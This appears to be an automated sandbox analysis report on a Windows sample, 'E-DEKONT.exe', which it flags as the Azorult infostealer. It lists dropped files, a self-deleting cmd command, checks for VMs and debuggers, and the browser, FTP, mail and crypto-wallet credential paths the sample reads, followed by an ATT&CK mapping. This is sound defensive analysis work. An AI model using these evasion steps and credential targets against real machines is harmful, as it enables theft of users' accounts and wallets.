                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\softokn3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\ucrtbase.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\freebl3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\msvcp140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\YdervggJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\SuperassumeJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddraJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\InternalisereJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Internalisere\Brnesangen.EndJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\logicalizationJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\logicalization\libxml2-2.0.typelibJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\logicalization\sgelngdernes.Dep74Jump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\SldedeJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede\memstat.cJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede\selection-end-symbolic.symbolic.pngJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Self deletion via cmd or bat file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exeJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect Any.run
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\nssdbm3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\softokn3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\freebl3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B6842D rdtsc 1_2_02B6842D
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: K32EnumDeviceDrivers,1_2_02B86198
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_004065C5 FindFirstFileW,FindClose,1_2_004065C5
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405990
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_00402862 FindFirstFileW,1_2_00402862
                  Source: C:\Users\user\Desktop\E-DEKONT.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeAPI call chain: ExitProcess graph end nodegraph_1-9270
                  Source: C:\Users\user\Desktop\E-DEKONT.exeAPI call chain: ExitProcess graph end nodegraph_1-9272
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                  Source: E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                  Source: E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
                  Source: E-DEKONT.exe, 00000004.00000003.108881783775.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108991550054.00000000019F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                  Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                  Source: E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_10001B18
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B6842D rdtsc 1_2_02B6842D
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B66CB5 mov eax, dword ptr fs:[00000030h]1_2_02B66CB5
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B66CCE mov eax, dword ptr fs:[00000030h]1_2_02B66CCE
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B71135 mov eax, dword ptr fs:[00000030h]1_2_02B71135
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B66D12 mov eax, dword ptr fs:[00000030h]1_2_02B66D12
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B83D61 mov eax, dword ptr fs:[00000030h]1_2_02B83D61
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B804ED CreateFileA,LdrLoadDll,1_2_02B804ED
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess created: C:\Users\user\Desktop\E-DEKONT.exe C:\Users\user\Desktop\E-DEKONT.exeJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403373

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Azorult
                  Source: Yara matchFile source: 00000004.00000002.109020742612.000000001D9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: E-DEKONT.exe PID: 4868, type: MEMORYSTR
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\E-DEKONT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\Jump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\E-DEKONT.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xmlJump to behavior
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Users\user\Desktop\E-DEKONT.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                  Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: Yara matchFile source: 4.2.E-DEKONT.exe.1df8883c.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.E-DEKONT.exe.1df32afc.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.E-DEKONT.exe.1df37450.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: E-DEKONT.exe PID: 4868, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Obfuscated Files or Information                  		2
                  OS Credential Dumping                  		2
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		Exfiltration Over Other Network Medium1
                  Ingress Tool Transfer                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                  System Shutdown/Reboot
                  Default AccountsScheduled Task/Job1
                  Windows Service                  		1
                  Access Token Manipulation                  		1
                  Timestomp                  		2
                  Credentials in Registry                  		36
                  System Information Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		Exfiltration Over Bluetooth11
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)1
                  Registry Run Keys / Startup Folder                  		1
                  Windows Service                  		1
                  DLL Side-Loading                  		1
                  Credentials In Files                  		121
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		Automated Exfiltration3
                  Non-Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)11
                  Process Injection                  		1
                  File Deletion                  		NTDS11
                  Virtualization/Sandbox Evasion                  		Distributed Component Object Model1
                  Clipboard Data                  		Scheduled Transfer14
                  Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon Script1
                  Registry Run Keys / Startup Folder                  		1
